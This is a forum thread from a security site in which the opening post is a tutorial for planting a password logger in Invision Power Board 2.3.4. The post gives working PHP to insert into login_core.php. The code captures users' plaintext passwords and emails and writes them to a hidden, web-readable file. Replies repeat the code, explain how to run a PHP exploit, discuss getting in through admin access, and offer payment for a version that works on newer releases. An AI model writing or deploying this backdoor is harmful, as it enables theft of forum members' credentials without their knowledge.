|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
[IPB][Tutorial]Password logger |
|
Posted: Thu Apr 17, 2008 3:10 pm |
|
|
tr0nix |
Active user |
|
|
Joined: Mar 06, 2008 |
Posts: 48 |
|
|
|
|
|
|
|
Tested under:
Invision Power Board 2.3.4
[Requirements]
- Access to the server
Open the "login_core.php", which is located at /IPB-PATH/sources/loginauth.
Search for
Code: | function auth_local( $username, $password ) |
and put the following lines under the function (above the $password = md5($password); line!):
Code: |
$lg_pwd = $password;
|
Then search for
Code: | $this->return_code = 'SUCCESS'; |
(the FIRST $this->return_code, its about line 331) and put the following lines above the $this->return_code variable:
Code: |
@include("conf_global.php");
$lg_username = strtolower($username);
$lg_password = $lg_pwd;
$lg_file = "./style_images/1/folder_mime_types/lg.html";
$connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
$selectdb = @mysql_select_db($INFO['sql_database']);
$sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 OR strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}
|
Now wait a little bit and see how the filesize of the logfile raises.
PS: If the Logger doesn't create the logfile automaticly, then you need to create it manually and give the file chmod 0777.
(c) by [Team n0rth] tr0nix <tr0nix@inbox.ru> |
|
|
|
|
|
|
|
|
Posted: Thu Apr 17, 2008 6:02 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
In IPB have other possible solution witout access to server,only admin access.Think. |
|
|
|
|
Posted: Thu Apr 17, 2008 8:40 pm |
|
|
tr0nix |
Active user |
|
|
Joined: Mar 06, 2008 |
Posts: 48 |
|
|
|
|
|
|
|
And?
You need just to edit this file and it really doesn't matter if you edit this file through a shell or through the template system or any other methods.
The coding stuff will be the same, so I don't understand why you try to goof off my works!?
koko wrote: | In IPB have other possible solution witout access to server,only admin access.Think. |
|
|
|
|
|
Posted: Fri Apr 18, 2008 9:38 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
To edit files on server you need user perm's.In 90% you don't have one. |
|
|
|
|
Posted: Wed Sep 03, 2008 5:46 pm |
|
|
_hacker_ |
Regular user |
|
|
Joined: Aug 26, 2008 |
Posts: 14 |
Location: asia |
|
|
|
|
|
|
some one have 2.3.4 perl ipb exploit ? coz it is easy to use |
|
|
|
|
Posted: Wed Sep 03, 2008 8:45 pm |
|
|
tr0nix |
Active user |
|
|
Joined: Mar 06, 2008 |
Posts: 48 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Thu Sep 04, 2008 11:55 am |
|
|
_hacker_ |
Regular user |
|
|
Joined: Aug 26, 2008 |
Posts: 14 |
Location: asia |
|
|
|
|
|
|
bro its php exploit i dont know how to use php exploit ...
i know only perl exploit
there is no diff between perl and php ?
for example if it was perl i did taht setps to run this..
1:install perl and save this as ipb.pl
and then go to cmd and then perl dir
c:/perl/bin\perl> ipb.pl
like that now what to do can u explain pl z? |
|
|
|
|
|
|
|
|
Posted: Fri Sep 05, 2008 12:14 am |
|
|
tr0nix |
Active user |
|
|
Joined: Mar 06, 2008 |
Posts: 48 |
|
|
|
|
|
|
|
_hacker_ wrote: |
bro its php exploit i dont know how to use php exploit ...
i know only perl exploit
there is no diff between perl and php ?
for example if it was perl i did taht setps to run this..
1:install perl and save this as ipb.pl
and then go to cmd and then perl dir
c:/perl/bin\perl> ipb.pl
like that now what to do can u explain pl z? |
Download xampp (http://www.apachefriends.org/en/xampp-windows.html) and install it.
Then start your command prompt (start -> run -> cmd :p) and type
Path\To\xampp\php\php.exe Path\To\The\Exploit\exploit.php.
I didn't test the PHP exploit, but the script should be writing some options. |
|
|
|
|
|
|
|
|
Posted: Tue Jan 13, 2009 2:45 pm |
|
|
waplet |
Active user |
|
|
Joined: Dec 24, 2008 |
Posts: 31 |
|
|
|
|
|
|
|
I got this !
Code: | $this->return_code = 'SUCCESS';
return; |
But where to put
Code: | @include("conf_global.php");
$lg_username = strtolower($username);
$lg_password = $lg_pwd;
$lg_file = "./style_images/1/folder_mime_types/lg.html";
$connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
$selectdb = @mysql_select_db($INFO['sql_database']);
$sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 OR strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
} |
this one? i cand uderstand . I dont wanna problems with error |
|
|
|
|
|
|
|
|
Posted: Mon Feb 16, 2009 7:25 pm |
|
|
delta |
Advanced user |
|
|
Joined: Jan 11, 2009 |
Posts: 60 |
|
|
|
|
|
|
|
pexli wrote: | In IPB have other possible solution witout access to server,only admin access.Think. |
How can i do using the admincp? |
|
|
|
|
|
newest ipb |
|
Posted: Mon Oct 05, 2009 5:13 am |
|
|
iiDo |
Regular user |
|
|
Joined: Nov 24, 2007 |
Posts: 19 |
|
|
|
|
|
|
|
anyone a idea how to log with the newest ipb??
thanks |
|
|
|
|
Posted: Tue Oct 20, 2009 3:07 pm |
|
|
thelordbug |
Beginner |
|
|
Joined: Oct 20, 2009 |
Posts: 2 |
|
|
|
|
|
|
|
Paying $20 USD via paypal for this to work for IPB 2.3.6 |
|
|
|
|
Posted: Sat Dec 05, 2009 2:37 am |
|
|
0x3 |
Regular user |
|
|
Joined: Jun 09, 2009 |
Posts: 10 |
Location: j0rd4n |
|
|
|
|
|
|
this doesn't work as it's look you get the password for the user from the db, it's well be MD5 like
Code: |
jonnye_r : 8bef052c7ae033ad47baab006846438f (j0@j0.com)
|
the Vbulltien it's work fine [ clear text ] but IPB need to get the password without the db ... so it's well be clear text..
so this one un useful i think...
/j0 |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|